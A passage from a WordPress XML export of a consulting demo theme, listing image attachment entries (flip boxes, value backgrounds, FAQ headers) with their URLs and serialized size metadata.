		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:21:"2020/09/flip-box1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"flip-box1-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"flip-box1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"flip-box1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/flip-box2/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>534</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:21:"2020/09/flip-box2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"flip-box2-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"flip-box2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"flip-box2-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/flip-box3/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>535</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:21:"2020/09/flip-box3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"flip-box3-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"flip-box3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"flip-box3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"flip-box3-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/bg1-value/</link>
		<pubDate>Tue, 08 Sep 2020 07:17:14 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>540</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:17:14]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:17:14]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:408;s:4:"file";s:21:"2020/09/bg1-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg1-value-300x64.jpg";s:5:"width";i:300;s:6:"height";i:64;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-value-1024x218.jpg";s:5:"width";i:1024;s:6:"height";i:218;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-value-768x163.jpg";s:5:"width";i:768;s:6:"height";i:163;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-value-1536x326.jpg";s:5:"width";i:1536;s:6:"height";i:326;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-value-600x408.jpg";s:5:"width";i:600;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg1-value-1200x408.jpg";s:5:"width";i:1200;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg1-value-1200x408.jpg";s:5:"width";i:1200;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/image1-value/</link>
		<pubDate>Tue, 08 Sep 2020 07:33:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>542</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:33:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:33:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:656;s:4:"file";s:24:"2020/09/image1-value.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"image1-value-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image1-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-value-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"image1-value-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/bg2-value/</link>
		<pubDate>Tue, 08 Sep 2020 08:26:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>549</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 08:26:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 08:26:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:686;s:4:"file";s:21:"2020/09/bg2-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg2-value-300x107.jpg";s:5:"width";i:300;s:6:"height";i:107;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg2-value-1024x366.jpg";s:5:"width";i:1024;s:6:"height";i:366;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg2-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg2-value-768x274.jpg";s:5:"width";i:768;s:6:"height";i:274;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg2-value-1536x549.jpg";s:5:"width";i:1536;s:6:"height";i:549;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-value-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg2-value-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg2-value-1200x686.jpg";s:5:"width";i:1200;s:6:"height";i:686;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg3-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/bg3-value/</link>
		<pubDate>Tue, 08 Sep 2020 08:53:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg3-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>558</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 08:53:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 08:53:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg3-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg3-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg3-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:692;s:4:"file";s:21:"2020/09/bg3-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg3-value-300x108.jpg";s:5:"width";i:300;s:6:"height";i:108;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg3-value-1024x369.jpg";s:5:"width";i:1024;s:6:"height";i:369;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg3-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg3-value-768x277.jpg";s:5:"width";i:768;s:6:"height";i:277;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg3-value-1536x554.jpg";s:5:"width";i:1536;s:6:"height";i:554;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-value-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg3-value-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg3-value-1200x692.jpg";s:5:"width";i:1200;s:6:"height";i:692;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/faqs/pheader-faq/</link>
		<pubDate>Tue, 08 Sep 2020 09:22:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>567</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:22:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:22:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:23:"2020/09/pheader-faq.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:22:"pheader-faq-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"pheader-faq-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"pheader-faq-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"pheader-faq-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"pheader-faq-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"pheader-faq-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"pheader-faq-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"pheader-faq-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"pheader-faq-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/faqs/bg1-faq/</link>
		<pubDate>Tue, 08 Sep 2020 09:41:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>571</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:41:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:41:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>566</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
